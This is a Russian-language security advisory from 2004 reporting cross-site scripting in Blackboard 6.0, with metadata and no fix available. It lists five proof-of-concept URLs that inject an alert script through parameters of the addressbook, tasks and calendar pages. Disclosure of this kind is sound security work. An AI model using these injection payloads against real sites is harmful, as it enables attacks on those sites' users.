Межайтовый скриптинг в Blackboard

Дата публикации:
14.04.2004
Всего просмотров:
949
Опасность:
Низкая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Blackboard Learning and Community Portal Systems 6
Уязвимые версии: Blackboard 6.0

Описание: Несколько уязвимостей обнаружено в Blackboard. Удаленный пользователь может выполнить XSS нападение.

Пример/Эксплоит:

http://[victim]/bin/common/addressbook.pl?action=ADD&nav=my_addressbook&course='%3E%3Cscript%3Ealert('Vulnera ble')%3C/script%3E

http://[victim]/bin/common/tasks.pl?action=c&display=T.subject&filter=--!!all&course_id=&render_type='%3E%3Cscript%3Ealert('Vulnerable')%3C/

http ://[victim]/bin/common/calendar.pl?course_name=%22%3E%3Cscript%3Ealert('Vulnerable')%3C/script%3E

http://[victim]/bin/common/calendar.pl?courseID=%22%3E%3Cscript%3Eale rt('Vulnerable')%3C/script%3E

http://[victim]/bin/common/calendar.pl?subroutine=%22%3E%3Cscript%3Ealert('Vulnerable')%3C/script%3E

URL производителя: http://www.blackboard.com/products/ps/index.htm

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

или введите имя

CAPTCHA